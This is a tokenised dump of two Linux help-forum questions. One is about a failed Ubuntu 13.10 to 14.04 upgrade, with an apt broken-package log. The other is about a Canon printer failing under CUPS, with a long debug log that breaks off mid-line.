468315	13.10 to 14.04 can not calculate the upgrade	i tried to upgrade 64 bit ubuntu 13.10 to 14.04 . i have an amd phenom ii x4 810 processor x 4 , 7gb memory , geforce 9800 gtx+/pcie/sse2 graphics , 960 gb hd ( 3.4 % full . ) i did n't have just one error..it looks like 31 packages were broken . the log is 33 pages long but here is where the repair looks like it tried to start : starting pkgproblemresolver with broken count : 31 starting 2 pkgproblemresolver with broken count : 31 investigating ( 0 ) libqt5core5a [ amd64 ] < none - > 5.2.1+dfsg-1ubuntu14 > ( libs ) broken libqt5core5a : amd64 breaks on libqt5core5 [ amd64 ] < 5.0.2+dfsg1-7ubuntu11.1 > ( libs ) ( < 5.2.0+dfsg~ ) considering libqt5core5 : amd64 0 as a solution to libqt5core5a : amd64 416 added libqt5core5 : amd64 to the remove list fixing libqt5core5a : amd64 via remove of libqt5core5 : amd64 markdelete libqt5core5 [ amd64 ] < 5.0.2+dfsg1-7ubuntu11.1 > ( libs ) fu=0 i just copied all the 'broken ' lines . the other lines were pretty similar for the most part . i did n't think i should paste all 33 pages here . broken libharfbuzz0b : amd64 conflicts on libharfbuzz0a [ amd64 ] < 0.9.19-1 > ( libs ) broken libharfbuzz0b : amd64 conflicts on libharfbuzz0a [ i386 ] < 0.9.19-1 > ( libs ) broken cups-filters : amd64 conflicts on foomatic-filters [ amd64 ] < 4.0.17-1ubuntu1 > ( universe/text ) broken libclutter-1.0-0 : amd64 breaks on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) broken unity-control-center : amd64 conflicts on gnome-control-center-unity [ amd64 ] < 1.3+13.10.20131004-0ubuntu1 > ( gnome ) broken libgoa-1.0-0b : amd64 conflicts on libgoa-1.0-0 [ amd64 ] < 3.8.3-2 > ( libs ) broken unity-control-center-signon : amd64 conflicts on gnome-control-center-signon [ amd64 ] < 0.1.7~+13.10.20130724.1-0ubuntu1 > ( gnome ) broken libunity-core-6.0-9 : amd64 conflicts on libunity-core-6.0-8 [ amd64 ] < 7.1.2+13.10.20131014.1-0ubuntu1 > ( libs ) broken libunity-core-6.0-9 : amd64 conflicts on unity-common [ amd64 ] < none | 7.0.0daily13.06.19~13.04-0ubuntu1 > ( gnome ) broken libaqbanking34-plugins : amd64 conflicts on libaqbanking-plugins-libgwenhywfar60 [ amd64 ] < 5.0.28beta-1 > ( libs ) ( < 5.3.5beta ) broken ubuntu-drivers-common : amd64 conflicts on jockey-common [ amd64 ] < 0.9.7-0ubuntu15 > ( admin ) broken ubuntu-drivers-common : amd64 conflicts on jockey-common [ i386 ] < none > ( none ) broken ubuntu-drivers-common : amd64 conflicts on jockey-gtk [ amd64 ] < 0.9.7-0ubuntu15 > ( oldlibs ) broken ubuntu-drivers-common : amd64 conflicts on jockey-gtk [ i386 ] < none > ( none ) broken libmono-wcf3.0a-cil : amd64 conflicts on libmono-wcf3.0-cil [ amd64 ] < 2.10.8.1-5ubuntu2 > ( cli-mono ) ( < 3.2.3 ) broken wine1.6-amd64 : amd64 depends on libopencl-1.1-1 [ amd64 ] < none > ( none ) broken libdb-java : amd64 conflicts on libdb5.1-java [ amd64 ] < 5.1.29-7 - > 5.1.29-7ubuntu1 > ( universe/java ) broken wine1.4-amd64 : amd64 depends on wine1.6-amd64 [ amd64 ] < none - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) broken wine1.6-i386 : i386 depends on libopencl-1.1-1 [ i386 ] < none > ( none ) broken wine1.4-i386 : i386 depends on wine1.6-i386 [ i386 ] < none - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libmutter0c : amd64 conflicts on libmutter0b [ amd64 ] < 3.8.4-0ubuntu2 > ( libs ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libgjs0e : amd64 conflicts on libgjs0d [ amd64 ] < 1.37.6-0ubuntu1 > ( libs ) broken libmono-csharp4.0c-cil : amd64 conflicts on libmono-csharp4.0-cil [ amd64 ] < 2.10.8.1-5ubuntu2 > ( cli-mono ) ( < 3.2.1 ) broken libdb5.1-java-gcj : amd64 depends on libdb5.1-java [ amd64 ] < 5.1.29-7 - > 5.1.29-7ubuntu1 > ( universe/java ) ( = 5.1.29-7ubuntu1 ) broken wine1.6 : amd64 depends on wine1.6-amd64 [ amd64 ] < none - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) ( = 1:1.6.2-0ubuntu4 ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken libcogl-pango12 : amd64 depends on libcogl12 [ amd64 ] < 1.14.0-2 > ( libs ) ( > = 1.13.4 ) broken libvlccore5 : amd64 depends on vlc-data [ amd64 ] < 2.0.8-1 - > 2.1.2-2build2 > ( universe/graphics ) ( = 2.0.8-1 ) broken libperl5.14 : amd64 depends on perl-base [ amd64 ] < 5.14.2-21build1 - > 5.18.2-2ubuntu1 > ( perl ) ( = 5.14.2-21build1 ) broken libubuntudownloadmanager1 : amd64 depends on libqt5core5 [ amd64 ] < 5.0.2+dfsg1-7ubuntu11.1 > ( libs ) ( > = 5.0.2 ) broken libmirserver7 : amd64 depends on libmirplatform [ amd64 ] < 0.0.15+13.10.20131014-0ubuntu1 - > 0.1.8+14.04.20140411-0ubuntu1 > ( libs ) ( = 0.0.15+13.10.20131014-0ubuntu1 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140505.be1469cc-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140507.18416b51-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken wine1.4 : amd64 depends on wine1.6 [ amd64 ] < none - > 1:1.6.2-0ubuntu4 > ( universe/otherosfs ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140505.be1469cc-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140507.18416b51-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140505.be1469cc-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140505.be1469cc-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140507.18416b51-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140505.be1469cc-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140507.18416b51-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-glamoregl [ amd64 ] < 0.6.0+git20140313.a4fbc773-0ubuntu0sarvatt~saucy > ( x11 ) broken xserver-xorg-video-ati : amd64 depends on xserver-xorg-video-radeon [ amd64 ] < 1:7.3.99+git20140505.be1469cc-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-mach64 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-r128 : amd64 depends on xorg-video-abi-15 [ amd64 ] < none > ( none ) broken xserver-xorg-video-glamoregl : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-intel : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-ati : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-radeon : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-nouveau : amd64 depends on xorg-video-abi-14 [ amd64 ] < none > ( none ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-ati [ amd64 ] < 1:7.3.99+git20140505.be1469cc-0ubuntu0ricotz~saucy > ( x11 ) broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-intel [ amd64 ] < 2:2.99.911+git20140507.18416b51-0ubuntu0ricotz~saucy > ( x11 ) and the final entry : broken xserver-xorg-video-all : amd64 depends on xserver-xorg-video-nouveau [ amd64 ] < 1:1.0.10+git20140220.480f0998-0ubuntu0sarvatt~saucy > ( x11 ) considering xserver-xorg-video-nouveau : amd64 10004 as a solution to xserver-xorg-video-all : amd64 10004 considering xserver-xorg-video-nouveau : amd64 10004 as a solution to xserver-xorg-video-all : amd64 10004 done i know that xserver is a video driver and i have an nvidia video card which has been challenging on pretty much every upgrade i have done . it has never done this before . one common suggestion is to disable all third-party ppas . i uncheck them and hit ok and try the upgrade . when i open up the software and updates window after trying the upgrade , all the ppas are checked again . anything pop out at someone ? i have n't loaded most of the apps it says are broken..with the exception of xserver . i just do all recommended updates when they come up . xserver i have pretty much gotten working with trial and error .
468319	canon i45000 series deskjet printer troubleshooting	i have recently started having issues with my canon usb printer . i did n't have any problems until recently , now i can not get any documents to print , and i get errors and brought to a diagnostic screen . i went through the diagnostics and this is the debug information i was given . any help or insight would be much appreciated , thanks in advance . d [ 17/may/2014:12:09:05 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:05 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:05 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:05 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:05 -0400 ] cupsdreadclient : 13 1.1 get-jobs 1 d [ 17/may/2014:12:09:05 -0400 ] get-jobs ipp : //localhost/printers/ d [ 17/may/2014:12:09:05 -0400 ] [ job 290 ] loading attributes ... d [ 17/may/2014:12:09:05 -0400 ] returning ipp successful-ok for get-jobs ( ipp : //localhost/printers/ ) from localhost d [ 17/may/2014:12:09:05 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:05 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:05 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:05 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:05 -0400 ] cupsdreadclient : 13 1.1 get-jobs 1 d [ 17/may/2014:12:09:05 -0400 ] get-jobs ipp : //localhost/printers/ d [ 17/may/2014:12:09:07 -0400 ] returning ipp successful-ok for get-jobs ( ipp : //localhost/printers/ ) from localhost d [ 17/may/2014:12:09:07 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:07 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:07 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:07 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:07 -0400 ] cupsdreadclient : 13 1.1 create-printer-subscription 1 d [ 17/may/2014:12:09:07 -0400 ] create-printer-subscription / d [ 17/may/2014:12:09:07 -0400 ] cupsdcreatesubscription ( con=0xb87c11a0 ( 13 ) , uri= '' / '' ) d [ 17/may/2014:12:09:07 -0400 ] pullmethod= '' ippget '' d [ 17/may/2014:12:09:07 -0400 ] notify-lease-duration=86400 d [ 17/may/2014:12:09:07 -0400 ] notify-time-interval=0 d [ 17/may/2014:12:09:07 -0400 ] cupsdaddsubscription ( mask=17800 , dest= ( nil ) ( ) , job= ( nil ) ( 0 ) , uri= '' ( null ) '' ) d [ 17/may/2014:12:09:07 -0400 ] added subscription 94 for server d [ 17/may/2014:12:09:07 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:07 -0400 ] returning ipp successful-ok for create-printer-subscription ( / ) from localhost d [ 17/may/2014:12:09:07 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:08 -0400 ] cupsdreadclient : 13 post / http/1.1 d [ 17/may/2014:12:09:08 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:08 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:08 -0400 ] cupsdreadclient : 13 1.1 get-notifications 1 d [ 17/may/2014:12:09:08 -0400 ] get-notifications / d [ 17/may/2014:12:09:08 -0400 ] cupsdisauthorized : requesting-user-name= '' skittles '' d [ 17/may/2014:12:09:08 -0400 ] returning ipp successful-ok for get-notifications ( / ) from localhost d [ 17/may/2014:12:09:08 -0400 ] cupsdsetbusystate : dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdacceptclient : 15 from localhost ( domain ) d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 15 post /printers/canon-i455 http/1.1 d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : active clients and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 15 1.1 print-job 1 d [ 17/may/2014:12:09:09 -0400 ] print-job ipp : //localhost/printers/canon-i455 d [ 17/may/2014:12:09:09 -0400 ] [ job ? ? ? ] auto-typing file ... i [ 17/may/2014:12:09:09 -0400 ] [ job ? ? ? ] request file type is application/vnd.cups-banner . d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- j- ) d [ 17/may/2014:12:09:09 -0400 ] add_job : requesting-user-name= '' skittles '' d [ 17/may/2014:12:09:09 -0400 ] adding default job-sheets values `` none , none '' ... i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] adding start banner page `` none '' . d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- j- ) i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] adding end banner page `` none '' . i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] file of type application/vnd.cups-banner queued by `` skittles '' . d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] hold_until=0 i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] queued on `` canon-i455 '' by `` skittles '' . d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- j- ) d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : active clients , printing jobs , and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] job-sheets=none , none d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] argv [ 0 ] = '' canon-i455 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] argv [ 1 ] = '' 291 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] argv [ 2 ] = '' skittles '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] argv [ 3 ] = '' test page '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] argv [ 4 ] = '' 1 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] argv [ 5 ] = '' job-uuid=urn : uuid:00737277-fc05-37c4-7411-9aab7ddd460e job-originating-host-name=localhost '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] argv [ 6 ] = '' /var/spool/cups/d00291-001 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 0 ] = '' cups_cachedir=/var/cache/cups '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 1 ] = '' cups_datadir=/usr/share/cups '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 2 ] = '' cups_docroot=/usr/share/cups/doc-root '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 3 ] = '' cups_fontpath=/usr/share/cups/fonts '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 4 ] = '' cups_requestroot=/var/spool/cups '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 5 ] = '' cups_serverbin=/usr/lib/cups '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 6 ] = '' cups_serverroot=/etc/cups '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 7 ] = '' cups_statedir=/var/run/cups '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 8 ] = '' home=/var/spool/cups/tmp '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 9 ] = '' path=/usr/lib/cups/filter : /usr/bin : /usr/sbin : /bin : /usr/bin '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 10 ] = '' server_admin=root @ skittles-desktop '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 11 ] = '' software=cups/1.4.3 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 12 ] = '' tmpdir=/var/spool/cups/tmp '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 13 ] = '' tz=america/new_york '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 14 ] = '' user=root '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 15 ] = '' cups_server=/var/run/cups/cups.sock '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 16 ] = '' cups_encryption=ifrequested '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 17 ] = '' ipp_port=631 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 18 ] = '' charset=utf-8 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 19 ] = '' lang=en_us.utf-8 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 20 ] = '' ppd=/etc/cups/ppd/canon-i455.ppd '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 21 ] = '' rip_max_cache=753483k '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 22 ] = '' content_type=application/vnd.cups-banner '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 23 ] = '' device_uri=usb : //canon/i455 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 24 ] = '' printer_info=canon i455 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 25 ] = '' printer_location=skittles-desktop '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 26 ] = '' printer=canon-i455 '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 27 ] = '' cups_filetype=document '' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] envp [ 28 ] = '' final_content_type=printer/canon-i455 '' i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] started filter /usr/lib/cups/filter/bannertops ( pid 3171 ) i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] started filter /usr/lib/cups/filter/pstopdf ( pid 3172 ) i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] started filter /usr/lib/cups/filter/pdftopdf ( pid 3173 ) i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] started filter /usr/lib/cups/filter/foomatic-rip ( pid 3174 ) i [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] started backend /usr/lib/cups/backend/usb ( pid 3175 ) d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:09 -0400 ] returning ipp successful-ok for print-job ( ipp : //localhost/printers/canon-i455 ) from localhost d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : printing jobs and dirty files d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] getting input from file d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] foomatic-rip version 4.0.4.217 running ... d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] parsing ppd file ... d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option pagesize d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option imageablearea d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option paperdimension d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option manual d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option mediatype d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option mediaweight d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option printquality d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option bitsperpixel d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option processcolormodel d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option resolution d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option printcolors d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] added option font d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] parameter summary d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] -- -- -- -- -- -- -- -- - d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] spooler : cups d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] printer : canon-i455 d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] shell : /bin/bash d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] ppd file : /etc/cups/ppd/canon-i455.ppd d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] attr file : d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] printer model : canon i450 foomatic/bjc800 ( recommended ) d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] job title : test page d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] file ( s ) to be printed : d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] < stdin > d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] ghostscript extra search path ( 'gs_lib ' ) : /usr/share/cups/fonts d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] printing system options : d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] pondering option 'job-uuid=urn : uuid:00737277-fc05-37c4-7411-9aab7ddd460e' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] unknown option job-uuid=urn : uuid:00737277-fc05-37c4-7411-9aab7ddd460e . d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] pondering option 'job-originating-host-name=localhost' d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] unknown option job-originating-host-name=localhost . d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] options from the ppd file : d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] ================================================ d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] file : < stdin > d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] ================================================ d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] pstopdf 5 args : 291 skittles test page 1 job-uuid=urn : uuid:00737277-fc05-37c4-7411-9aab7ddd460e job-originating-host-name=localhost d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] ppd : /etc/cups/ppd/canon-i455.ppd d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] state : +connecting-to-device d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] printer using device file `` /dev/usblp0 '' ... d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] state : -connecting-to-device d [ 17/may/2014:12:09:09 -0400 ] cupsdmarkdirty ( -- -- -s ) d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] backendrunloop ( print_fd=0 , device_fd=5 , snmp_fd=-1 , addr= ( nil ) , use_bc=0 , side_cb=0xb771bb40 ) d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] load_banner ( filename= '' /var/spool/cups/d00291-001 '' ) d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] page = 612x792 ; 18,36 to 594,756 d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] png image : 128x128x8 , color_type=6 ( rgb+alpha ) d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] png image : 192x128x8 , color_type=2 ( rgb ) d [ 17/may/2014:12:09:09 -0400 ] pid 3171 ( /usr/lib/cups/filter/bannertops ) exited with no errors . d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] resolution : 600x600 d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] page size : letter d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] width : 612 , height : 792 , absolute margins : 18 , 36 , 594 , 756 d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] relative margins : 18 , 36 , 18 , 36 d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] ppd options : -r600 -ddevicewidthpoints=612 -ddeviceheightpoints=792 d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] postscript to be injected : d [ 17/may/2014:12:09:09 -0400 ] [ job 291 ] running cat | /usr/bin/gs -q -dnopause -dbatch -sdevice=pdfwrite -dcompatibilitylevel=1.3 -dautorotatepages=/none -dautofiltercolorimages=false -dnoplatfonts -dparanoidsafer -sstdout= % stderr -dcolorimagefilter=/flateencode -dpdfsettings=/printer -dcolorconversionstrategy=/leavecolorunchanged -ddonumcopies -r600 -ddevicewidthpoints=612 -ddeviceheightpoints=792 -soutputfile=- -c .setpdfwrite -f - d [ 17/may/2014:12:09:09 -0400 ] cupsdacceptclient : 17 from localhost ( domain ) d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 post / http/1.1 d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : active clients , printing jobs , and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 1.1 get-jobs 1 d [ 17/may/2014:12:09:09 -0400 ] get-jobs ipp : //localhost/printers/ d [ 17/may/2014:12:09:09 -0400 ] returning ipp successful-ok for get-jobs ( ipp : //localhost/printers/ ) from localhost d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : printing jobs and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 waiting closing on eof d [ 17/may/2014:12:09:09 -0400 ] cupsdcloseclient : 17 d [ 17/may/2014:12:09:09 -0400 ] cupsdacceptclient : 17 from localhost ( domain ) d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 post / http/1.1 d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : active clients , printing jobs , and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdauthorize : no authentication data provided . d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 1.1 get-notifications 1 d [ 17/may/2014:12:09:09 -0400 ] get-notifications / d [ 17/may/2014:12:09:09 -0400 ] cupsdisauthorized : requesting-user-name= '' skittles '' d [ 17/may/2014:12:09:09 -0400 ] returning ipp successful-ok for get-notifications ( / ) from localhost d [ 17/may/2014:12:09:09 -0400 ] cupsdsetbusystate : printing jobs and dirty files d [ 17/may/2014:12:09:09 -0400 ] cupsdreadclient : 17 post 